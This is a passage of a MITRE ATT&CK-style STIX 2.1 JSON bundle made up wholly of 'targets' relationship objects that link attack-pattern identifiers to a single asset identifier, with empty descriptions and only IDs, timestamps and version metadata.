"x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--90469174-769a-4e02-beaf-5e239b372708", "created": "2024-07-01T10:37:15.842258", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842260", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f76c1864-c233-465e-a4af-3acedba5630c", "created": "2024-07-01T10:37:15.842266", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842268", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--009879fa-045d-470d-82b8-030bf9f15b8e", "created": "2024-07-01T10:37:15.842275", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842277", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--430198c1-8653-45f3-b947-db899966f2a3", "created": "2024-07-01T10:37:15.842283", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842285", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--06e7d929-d10b-4344-8b14-498cceba5e82", "created": "2024-07-01T10:37:15.842292", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842294", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86d612bd-f62b-48d0-b23f-725271b30b84", "created": "2024-07-01T10:37:15.842301", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842303", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c08cfb9-0db7-4cee-b1ee-d87c5abab5b3", "created": "2024-07-01T10:37:15.842309", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842311", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c55e9b11-202e-4463-be48-bd3165e610a1", "created": "2024-07-01T10:37:15.842318", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842319", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2dd1df15-12ba-42b6-9e00-dd0d8a59ab36", "created": "2024-07-01T10:37:15.842326", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842328", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--868b576d-9b95-4504-98cb-de5589132321", "created": "2024-07-01T10:37:15.842335", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842336", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a909028-5617-4b21-8f0f-0dc61714db3c", "created": "2024-07-01T10:37:15.842343", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842345", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0657884a-c03a-42a4-a70f-95b5250adcf5", "created": "2024-07-01T10:37:15.842352", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842354", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e0e9c794-181c-4487-9cf2-c4f43e2fbbb6", "created": "2024-07-01T10:37:15.842360", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842362", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f09738da-d882-4c25-9ad8-df8f58b9f74f", "created": "2024-07-01T10:37:15.842369", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842371", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a033f6a-c418-404c-9c9b-e72a46245caa", "created": "2024-07-01T10:37:15.842377", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842379", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--acfb4f75-1dc0-4247-86dc-d5564e9dfcf6", "created": "2024-07-01T10:37:15.842386", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842388", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ee3479d-1966-453e-ad98-39a47528f072", "created": "2024-07-01T10:37:15.842394", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842396", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d463f059-ad06-483f-99a2-3275a4615386", "created": "2024-07-01T10:37:15.842403", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842405", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--679ca30d-7bb7-4747-ae58-629a93ea3c28", "created": "2024-07-01T10:37:15.842412", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842413", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--350bb705-c44a-45df-92f4-6fcdc3a648e4", "created": "2024-07-01T10:37:15.842420", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842422", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9c554a89-224b-4310-937a-c49dadafc15c", "created": "2024-07-01T10:37:15.842428", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842430", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7033808-355f-42d0-ab20-692f3a46550d", "created": "2024-07-01T10:37:15.842437", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842439", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c99bc023-83a3-4c14-8209-1581fc2b41f0", "created": "2024-07-01T10:37:15.842445", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842447", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c39c540-2765-488b-80ed-c8e5c68c52d2", "created": "2024-07-01T10:37:15.842454", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842456", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1343326a-b9ae-42e4-b4a1-7fb6b6009589", "created": "2024-07-01T10:37:15.842462", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842464", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e75cd8a-6fbc-48d4-a8ae-436176a65663", "created": "2024-07-01T10:37:15.842471", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842473", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10ff3a70-5e2a-47fb-8b64-f6fb64ca6cc1", "created": "2024-07-01T10:37:15.842479", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842481", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--215352a2-6232-4e7f-8ec4-dd1126e78c6c", "created": "2024-07-01T10:37:15.842488", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842489", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce24ac7f-ef30-4951-8604-de96011454b6", "created": "2024-07-01T10:37:15.842496", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842498", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be084c55-9e62-4789-b61c-2b670d186a7e", "created": "2024-07-01T10:37:15.842505", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842506", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d040f36f-1b34-4482-9a81-6bc8826e13b9", "created": "2024-07-01T10:37:15.842513", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842515", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78e51d27-ab5a-43bd-ac0b-1fb192448997", "created": "2024-07-01T10:37:15.842522", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47b98b7c-7e97-4653-8566-cebbfcb93b50", "created": "2024-07-01T10:37:15.842530", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842532", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb6af425-b85d-4fdb-ad50-573b6e3a3406", "created": "2024-07-01T10:37:15.842539", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842541", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27fe7319-a040-462c-988e-2bc990030566", "created": "2024-07-01T10:37:15.842547", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842549", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bbc4505-637b-4dff-bdb7-c1087e58387d", "created": "2024-07-01T10:37:15.842556", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842558", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--feb1fca7-1609-4eda-abdb-f99a896f8faf", "created": "2024-07-01T10:37:15.842564", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842566", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ea1e4c4-e5ce-4a14-a431-0d6879edcc6e", "created": "2024-07-01T10:37:15.842573", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842575", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6af15ab-433a-48b7-83d6-c2191bee02c5", "created": "2024-07-01T10:37:15.842581", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842583", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--58353f12-3e5f-4f35-91ba-74001ad3d760", "created": "2024-07-01T10:37:15.842590", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842592", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--54aa7286-2603-4fe7-ba05-c9095afdedaf", "created": "2024-07-01T10:37:15.842598", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842600", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": 